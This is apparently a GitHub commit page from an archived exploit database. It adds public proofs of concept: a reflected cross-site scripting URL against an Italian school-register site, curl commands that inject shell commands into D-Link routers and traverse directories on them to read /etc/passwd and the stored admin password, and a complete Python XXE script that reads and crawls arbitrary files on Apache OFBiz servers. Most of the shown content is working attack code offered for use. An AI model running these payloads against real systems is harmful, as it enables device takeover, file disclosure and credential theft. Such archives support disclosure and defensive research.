This repository has been archived by the owner on Nov 28, 2022. It is now read-only.
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
15 changes to exploits/shellcodes Adult Filter 1.0 - Denial of Service (PoC) Microsoft Data Sharing - Local Privilege Escalation (PoC) Webmin 1.5 - Web Brute Force (CGI) exim 4.90 - Remote Code Execution School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection School ERP Pro+Responsive 1.0 - 'fid' SQL Injection SIM-PKH 2.4.1 - 'id' SQL Injection MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection SG ERP 1.0 - 'info' SQL Injection Fifa Master XLS 2.3.2 - 'usw' SQL Injection Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting Apache OFBiz 16.11.04 - XML External Entity Injection D-Link Routers - Command Injection D-Link Routers - Plaintext Password D-Link Routers - Directory Traversal Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes
- Loading branch information
Offensive Security
committed
Oct 25, 2018
1 parent
4f60a3d
commit dac8dd4
Showing
15 changed files
with
1,127 additions
and
4 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
# Exploit Title: Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting | ||
# Dork: n/a | ||
# Date: 2018-10-11 | ||
# Exploit Author: Dino Barlattani | ||
# Vendor Homepage: http://axiositalia.it/ | ||
# Software Link: http://axiositalia.it/?page_id=1907 | ||
# Version: 1.7.0/7.0.0 | ||
# Category: Webapps | ||
# Platform: ASPX | ||
# CVE: N/A | ||
|
||
# POC: | ||
# https://family.axioscloud.it/secret/relogoff.aspx?Error_Desc=Sessione%20non%20Validaa%3Cbody%20onload=%22alert(%27ok%27);%22%3E&Error_Parameters= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,23 @@ | ||
## Shell command injection | ||
CVE: CVE-2018-10823 | ||
|
||
CVSS v3: 9.1 | ||
AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H | ||
|
||
Description: An issue was discovered on D-Link routers: | ||
|
||
DWR-116 through 1.06, | ||
DWR-512 through 2.02, | ||
DWR-712 through 2.02, | ||
DWR-912 through 2.02, | ||
DWR-921 through 2.02, | ||
DWR-111 through 1.01, | ||
and probably others with the same type of firmware. | ||
An authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. | ||
|
||
PoC: | ||
|
||
Login to the router. | ||
Request the following URL after login: | ||
`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd` | ||
See the passwd file contents in the response. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
## Password stored in plaintext | ||
CVE: CVE-2018-10824 | ||
|
||
Description: | ||
|
||
An issue was discovered on D-Link routers: | ||
|
||
DWR-116 through 1.06, | ||
DIR-140L through 1.02, | ||
DIR-640L through 1.02, | ||
DWR-512 through 2.02, | ||
DWR-712 through 2.02, | ||
DWR-912 through 2.02, | ||
DWR-921 through 2.02, | ||
DWR-111 through 1.01, | ||
and probably others with the same type of firmware. | ||
NOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple | ||
|
||
The administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access. | ||
|
||
PoC using the directory traversal vulnerability disclosed above - CVE-2018-10822 | ||
|
||
`$ curl http://routerip/uir//tmp/XXX/0` | ||
This command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
Directory Traversal | ||
CVE: CVE-2018-10822 | ||
|
||
CVSS v3: 8.6 | ||
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N | ||
|
||
Description: Directory traversal vulnerability in the web interface on D-Link routers: | ||
|
||
DWR-116 through 1.06, | ||
DIR-140L through 1.02, | ||
DIR-640L through 1.02, | ||
DWR-512 through 2.02, | ||
DWR-712 through 2.02, | ||
DWR-912 through 2.02, | ||
DWR-921 through 2.02, | ||
DWR-111 through 1.01, | ||
and probably others with the same type of firmware | ||
allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. | ||
|
||
NOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190. | ||
|
||
PoC: | ||
|
||
`$ curl http://routerip/uir//etc/passwd` | ||
The vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824. | ||
|
||
This vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,125 @@ | ||
# Exploit Title: Apache OFBiz 16.11.04 - XML External Entity Injection | ||
# Date: 2018-10-15 | ||
# Exploit Author: Jamie Parfet | ||
# Vendor Homepage: https://ofbiz.apache.org/ | ||
# Software Link: https://archive.apache.org/dist/ofbiz/ | ||
# Version: < 16.11.04 | ||
# Tested on: Ubuntu 18.04.1 | ||
# CVE: N/A | ||
|
||
#!/usr/bin/env python3 | ||
# ***************************************************** | ||
# Type: XML External Entity Injection (File disclosure) | ||
# Target: Apache OFBiz < 16.11.04 | ||
# Author: Jamie Parfet | ||
# ***************************************************** | ||
import sys | ||
import os | ||
import requests | ||
import urllib3 | ||
import re | ||
import argparse | ||
|
||
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | ||
|
||
simple_payload = """<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://{}">]> | ||
<methodCall><methodName>xXx | ||
&disclose;xXx</methodName></methodCall> | ||
""" | ||
|
||
if len(sys.argv) <= 1: | ||
print('[*] Apache OFBiz < 16.11.04 XXE') | ||
print('[*] Use "%s -h" to display help.' % (sys.argv[0])) | ||
exit(0) | ||
|
||
|
||
parser = argparse.ArgumentParser() | ||
parser.add_argument("-u", | ||
metavar="https://localhost:8443", | ||
dest="url", | ||
required=True, | ||
help="Target URL (required)", | ||
action='store') | ||
parser.add_argument("-f", | ||
metavar="/etc/passwd", | ||
dest="file", | ||
help="Target file", | ||
action='store') | ||
parser.add_argument("-c", | ||
metavar="/home/", | ||
dest="crawl", | ||
help="Target directory to start crawling from", | ||
action='store') | ||
parser.add_argument("-o", | ||
metavar="~/local/output/directory/", | ||
dest="output_dir", | ||
help="Local directory that remote file will be saved to", | ||
action='store') | ||
args = parser.parse_args() | ||
url = args.url if args.url else None | ||
target_file = args.file if args.file else None | ||
crawl_dir = args.crawl if args.crawl else None | ||
output_dir = args.output_dir if args.output_dir else None | ||
|
||
|
||
def check_url(url): | ||
if '://' not in url: | ||
print('[-] ERROR: Please include protocol in URL, such as https://{}'.format(url)) | ||
exit(0) | ||
else: | ||
return url | ||
|
||
|
||
def request(url, payload): | ||
response = requests.post(url + '/webtools/control/xmlrpc', data=payload, verify=False).text | ||
parsed_response = re.sub(r'(.*xXx\n|xXx.*)', '', response) | ||
return parsed_response | ||
|
||
|
||
def crawl(crawl_dir): | ||
payload = simple_payload.format(crawl_dir) | ||
response = request(url, payload) | ||
payload_404 = simple_payload.format(crawl_dir + "/xX404Xx") | ||
response_404 = request(url, payload_404) | ||
if 'No such file or directory' in response: | ||
print("[-] ERROR - 404: {}".format(crawl_dir)) | ||
elif 'Permission denied' in response or 'but is not accessible' in response: | ||
print("[-] ERROR - Permission: {}".format(crawl_dir)) | ||
elif 'Not a directory' in response_404: | ||
print("[*] FILE: {}".format(crawl_dir)) | ||
else: | ||
print("[*] DIR: {}".format(crawl_dir)) | ||
for f in response.splitlines(): | ||
full_path = (crawl_dir + '/' + f) | ||
crawl(full_path) | ||
|
||
|
||
def main(url=url, target_file=target_file, crawl_dir=crawl_dir, output_dir=output_dir): | ||
if url: | ||
check_url(url) | ||
if crawl_dir: | ||
crawl(crawl_dir) | ||
else: | ||
payload = simple_payload.format(target_file) | ||
if output_dir: | ||
if os.path.isdir(output_dir): | ||
result = request(url, payload) | ||
remote_file_name = re.sub('/', '--', target_file) | ||
output_file = (output_dir + '/' + remote_file_name[2:]) | ||
file = open(output_file, 'w') | ||
file.write(result) | ||
file.close() | ||
else: | ||
print("[-] ERROR: {} is not a writeable directory".format(output_dir)) | ||
else: | ||
result = request(url, payload) | ||
print(result) | ||
|
||
|
||
if __name__ == '__main__': | ||
try: | ||
main() | ||
except KeyboardInterrupt: | ||
print('\nKeyboard interrupt detected.') | ||
print('Exiting...') | ||
exit(0) |
Oops, something went wrong.